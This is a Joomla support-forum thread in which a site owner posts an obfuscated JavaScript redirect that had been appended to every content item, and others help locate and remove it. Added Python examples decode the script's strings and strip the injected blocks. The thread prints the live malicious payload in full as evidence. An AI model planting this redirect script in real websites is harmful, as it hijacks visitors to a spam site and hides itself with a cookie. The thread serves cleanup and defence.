Joomla website contains a redirect to spam website

Discussion regarding Joomla! 3.x security issues.

rv789
Joomla! Apprentice
Posts: 19
Joined: Thu Nov 03, 2016 10:15 am

Joomla website contains a redirect to spam website

Post by rv789 » Sat Nov 14, 2020 11:47 am

Hi,

My website suddenly contains a redirect to a spam website. Visible in this source code:

a=['toUTCString','cookie','split','length','charAt','substring','indexOf','userAgent','match','MSIE;','OPR','Chromium','Firefox','Chrome','ppkcookie','location','https://www.areyourobots.xyz','getElementById','wpadminbar','undefined','setTime','getTime',';\x20expires='];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b('0x0')](b('0x1'))===null){if(typeof c===b('0x2')){function c(d,e,f){var g='';if(f){var h=new Date();h[b('0x3')](h[b('0x4')]()+f*0x18*0x3c*0x3c*0x3e8);g=b('0x5')+h[b('0x6')]();}document[b('0x7')]=d+'='+(e||'')+g+';\x20path=/';}function i(j){var k=j+'=';var l=document[b('0x7')][b('0x8')](';');for(var m=0x0;m<l[b('0x9')];m++){var n=l[m];while(n[b('0xa')](0x0)=='\x20')n=n[b('0xb')](0x1,n['length']);if(n[b('0xc')](k)==0x0)return n[b('0xb')](k[b('0x9')],n['length']);}return null;}function o(){return navigator[b('0xd')][b('0xe')](/Android/i)||navigator['userAgent'][b('0xe')](/BlackBerry/i)||navigator[b('0xd')][b('0xe')](/iPhone|iPad|iPod/i)||navigator[b('0xd')][b('0xe')](/Opera Mini/i)||navigator[b('0xd')][b('0xe')](/IEMobile/i);}function p(){return navigator[b('0xd')]['indexOf']('Edge')!==-0x1||navigator['userAgent'][b('0xc')](b('0xf'))!==-0x1||navigator[b('0xd')][b('0xc')](b('0x10'))!==-0x1||navigator[b('0xd')][b('0xc')](b('0x11'))!==-0x1||navigator[b('0xd')]['indexOf'](b('0x12'))!==-0x1||navigator[b('0xd')]['indexOf'](b('0x13'))!==-0x1;}var q=i(b('0x14'));if(q!=='un'){if(p()||o()){c(b('0x14'),'un',0x16d);window[b('0x15')]['replace'](b('0x16'));}}}}}(this));

Now while looking/searching through all the code + database there is nowhere to be found where this code is actually injected in the output HTML. Also did a file timestamp check but no apparent files with an unusual timestamp.

I can replace the Joomla code, database, whatever but until I understand where this injection comes from this would be futile.

What would be the next step for me to take to analyse this issue?
What could be causing this code injection?
Any hints? Surely I would not be the first to have an issue with this.

Joomla code was recently (3.9.18) upgraded to 3.9.22 today. This did not resolve the issue. Nothing unusual in FPA.
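
The string-table lookups in the script posted above, resolved offline as an added example (not part of the original post or of any tool named in this thread). The table and the rotation count 0x1f4 are copied from that script; the names `rotate` and `resolve` are assumptions of this example.

```python
import re

# String table and rotation count copied from the script posted above.
TABLE = ['toUTCString', 'cookie', 'split', 'length', 'charAt', 'substring',
         'indexOf', 'userAgent', 'match', 'MSIE;', 'OPR', 'Chromium',
         'Firefox', 'Chrome', 'ppkcookie', 'location',
         'https://www.areyourobots.xyz', 'getElementById', 'wpadminbar',
         'undefined', 'setTime', 'getTime', ';\x20expires=']
ROTATIONS = 0x1f4  # 500: the script's while(--f) loop runs push(shift()) 500 times

# Matches the script's lookup calls, e.g. b('0x16')
LOOKUP = re.compile(r"b\('(0x[0-9a-f]+)'\)")


def rotate(table, count):
    """Left-rotate the table the same way the push(shift()) loop does."""
    k = count % len(table)
    return table[k:] + table[:k]


def resolve(snippet, table=TABLE, count=ROTATIONS):
    """Replace every b('0x..') lookup in snippet with the string it returns."""
    rotated = rotate(table, count)
    return LOOKUP.sub(lambda m: repr(rotated[int(m.group(1), 16)]), snippet)


if __name__ == "__main__":
    # Fragments copied from the posted script; nothing is executed, only rewritten.
    for fragment in ("document[b('0x0')](b('0x1'))===null",
                     "var q=i(b('0x14'));",
                     "window[b('0x15')]['replace'](b('0x16'));"):
        print(resolve(fragment))
```

The resolved strings (`ppkcookie` and the redirect URL) are usable search terms when looking for the payload in files and database tables. The script sets the `ppkcookie` cookie for 0x16d (365) days before redirecting, so a browser that has already been redirected once will not show the behaviour again until that cookie is cleared.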

gsmela
Joomla! Explorer
Posts: 312
Joined: Thu Jun 10, 2010 12:38 pm

Re: Joomla website contains a redirect to spam website

Post by gsmela » Sat Nov 14, 2020 12:21 pm

The experts will tell you to post the FPA since that is what it is for and is as good a place to start as any.

Your site has probably been hacked. I'd go to mysites.guru and run an audit. The first one is free and will tell you what's wrong.

JAVesey
Joomla! Hero
Posts: 2656
Joined: Tue May 14, 2013 1:21 pm
Location: Cardiff, Wales, UK

Re: Joomla website contains a redirect to spam website

Post by JAVesey » Sat Nov 14, 2020 5:40 pm

gsmela wrote: Sat Nov 14, 2020 12:21 pm
The experts will tell you to post the FPA since that is what it is for and is as good a place to start as any.

Your site has probably been hacked. I'd go to mysites.guru and run an audit. The first one is free and will tell you what's wrong.

All good advice.

My guess would be an old/outdated/insecure extension or misconfigured permissions rather than a Joomla core vulnerability.

FPA and mysites.guru 1st choice every time :)
John V
Cardiff, Wales, UK
Joomla 5.1.1 "live" site on PHP 8.2.15 and MariaDB 10.11.7 (with b/c plugin enabled)
Joomla 5.1.1 on XAMPP for MacOS with PHP 8.2.4 and MariaDB 10.4.28 (with b/c plugin enabled)

rv789
Joomla! Apprentice
Posts: 19
Joined: Thu Nov 03, 2016 10:15 am

Re: Joomla website contains a redirect to spam website

Post by rv789 » Mon Nov 16, 2020 4:41 pm

Well, I did check mysites + FPA but nothing that would hint as to where this HTML code is actually injected. First I need to find this before I can take any further measures.

I am pretty sure someone here would have seen this issue before and could give me a proper hint.
Last edited by rv789 on Mon Nov 16, 2020 4:45 pm, edited 1 time in total.

gsmela
Joomla! Explorer
Posts: 312
Joined: Thu Jun 10, 2010 12:38 pm

Re: Joomla website contains a redirect to spam website

Post by gsmela » Mon Nov 16, 2020 4:44 pm

If you're going to ignore the suggestion to post the FPA so the experts can review it, why keep coming back?

PhilTaylor-Prazgod
Joomla! Ace
Posts: 1404
Joined: Sat Aug 20, 2005 12:32 pm
Location: Jersey, Channel Islands

Re: Joomla website contains a redirect to spam website

Post by PhilTaylor-Prazgod » Mon Nov 16, 2020 5:29 pm

Well, I did check mysites ... but nothing that would hint as to where this HTML code is actually injected

I'm sorry to hear that. You did not ask for support for the mySites.guru product or ask me why it never found anything... mySites.guru certainly does find this exact code snippet and would display it under normal audit conditions, in its suspect content tool.

In fact as the only person registering at mySites.guru today used a fake disposable address, this account has now been blocked too. mySites.guru is not a disposable service, it is a subscription service with a free trial.
Phil Taylor
- https://mySites.guru - Manage Multiple Joomla/WordPress Sites In One Dashboard for Security, Audits, Backups and more....
- https://www.phil-taylor.com/

PhilTaylor-Prazgod
Joomla! Ace
Posts: 1404
Joined: Sat Aug 20, 2005 12:32 pm
Location: Jersey, Channel Islands

Re: Joomla website contains a redirect to spam website

Post by PhilTaylor-Prazgod » Mon Nov 16, 2020 5:38 pm

I'll give you this free hint.

The script has been appended to all your content items in the database. You will need to manually delete this from every content item in the database.
Phil Taylor
- https://mySites.guru - Manage Multiple Joomla/WordPress Sites In One Dashboard for Security, Audits, Backups and more....
- https://www.phil-taylor.com/

rv789
Joomla! Apprentice
Posts: 19
Joined: Thu Nov 03, 2016 10:15 am

Re: Joomla website contains a redirect to spam website

Post by rv789 » Mon Nov 16, 2020 6:23 pm

Hi Phil Taylor,

That is very useful advice. But why am I not seeing the code in phpMyAdmin?

rv789
Joomla! Apprentice
Posts: 19
Joined: Thu Nov 03, 2016 10:15 am

Re: Joomla website contains a redirect to spam website

Post by rv789 » Tue Nov 17, 2020 9:16 am

For anybody interested in a simple path to a solution, here are the steps I took (bypassing any replies from regular visitors here that do not make you feel too warm and welcome on this forum):

1. Go to your phpMyAdmin (note the offending code is not visible here!)
2. Export your table j35_content
3. Open the exported file in a *good* text editor like Notepad++
4. Search for a part of the offending JS code. You should see it in every record
5. Now search-and-replace the offending code. Make sure to search for the full JS code starting with <script> and ending with </script>, and take care not to include any surrounding characters. Replace all occurrences with an empty string.
6. Save the file
7. In phpMyAdmin, rename the j35_content table to say j35_content_hacked
8. In phpMyAdmin, import the edited file from step 6. Check that your j35_content table is there and has content.
9. Clean the Joomla cache, if needed delete any file from /cache/com_content via FileZilla.

After this, update or remove any outdated extension in your Joomla, they could have been the vulnerability that your hacker used to poison your database.

All this makes me wonder: why is Joomla allowing script code from a content table to leak to the HTML? I can see no reason why not to block this via some blacklist regex.
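
One way to script the search-and-replace from the steps above, as an added example that is not part of the original post: it removes only `<script>` blocks containing strings from the posted payload and leaves other scripts alone. The marker strings come from the script at the top of the thread and `introtext`/`fulltext` are the text columns of Joomla's content table; the sample rows and function names are constructed for this example.

```python
import re

# Marker strings taken from the script posted at the top of this thread.
MARKERS = ("areyourobots.xyz", "ppkcookie")
COLUMNS = ("introtext", "fulltext")  # text columns of Joomla's content table
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.I | re.S)


def strip_injected(html):
    """Drop only <script> blocks that contain a marker; return (html, removed)."""
    removed = 0

    def repl(match):
        nonlocal removed
        if any(marker in match.group(0) for marker in MARKERS):
            removed += 1
            return ""
        return match.group(0)  # unrelated script block: keep it untouched

    return SCRIPT_RE.sub(repl, html), removed


def clean_rows(rows):
    """Return (cleaned copies of rows, [(id, blocks_removed), ...])."""
    cleaned, report = [], []
    for row in rows:
        new, hits = dict(row), 0
        for col in COLUMNS:
            if new.get(col):  # skip NULL/empty columns
                new[col], n = strip_injected(new[col])
                hits += n
        if hits:
            report.append((row["id"], hits))
        cleaned.append(new)
    return cleaned, report


# Constructed sample rows; the payload is shortened to a stand-in.
SAMPLE = [
    {"id": 1, "introtext": "<p>Welcome</p><script>a=['ppkcookie','https://www.areyourobots.xyz'];</script>", "fulltext": ""},
    {"id": 2, "introtext": '<p>Map</p><script src="/media/map.js"></script>', "fulltext": None},
    {"id": 3, "introtext": "<p>News</p>", "fulltext": "<p>More</p><SCRIPT>var c='ppkcookie';</SCRIPT>"},
]

if __name__ == "__main__":
    for row_id, n in clean_rows(SAMPLE)[1]:
        print(f"row {row_id}: removed {n} injected script block(s)")
```

The report lists which rows were touched, so the result can be checked against the renamed backup table before the cleaned rows are written back.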

rv789
Joomla! Apprentice
Posts: 19
Joined: Thu Nov 03, 2016 10:15 am

Can I block script content from the Joomla db to leak to the HTML?

Post by rv789 » Tue Nov 17, 2020 9:19 am

Hi,

Would it be possible to block any JavaScript code from the j35_content table to leak through to the resulting HTML?

I see no good reason for JS code to be allowed in the content and it is a great chance for hackers to put harm on your website. And it is as simple as a blacklist regex.

Any core functionality or extension that blacklists script content?
Last edited by toivo on Tue Nov 17, 2020 9:25 am, edited 1 time in total.
Reason: mod note: merged with the current topic

Rondeb
Joomla! Guru
Posts: 623
Joined: Mon Dec 02, 2013 12:14 pm
Location: Meschede - Germany

Re: Joomla website contains a redirect to spam website

Post by Rondeb » Tue Nov 17, 2020 9:20 am

Good to read that it has been resolved.

Another tip: change all your passwords, from the database to the Joomla login, otherwise the hackers might get in again.

Greetings Ron :)

